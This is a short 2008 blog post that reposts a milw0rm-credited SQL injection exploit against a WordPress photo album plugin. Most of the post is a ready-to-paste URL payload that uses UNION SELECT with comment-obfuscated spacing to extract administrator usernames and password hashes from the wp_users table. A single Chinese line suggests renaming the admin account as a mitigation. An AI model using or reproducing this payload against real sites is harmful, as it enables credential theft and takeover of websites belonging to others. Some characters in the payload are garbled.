Archive

Posts Tagged ‘Remote SQL Injection’

Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008
1 comment

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

wordpress支持, 漏洞 , , , , , ,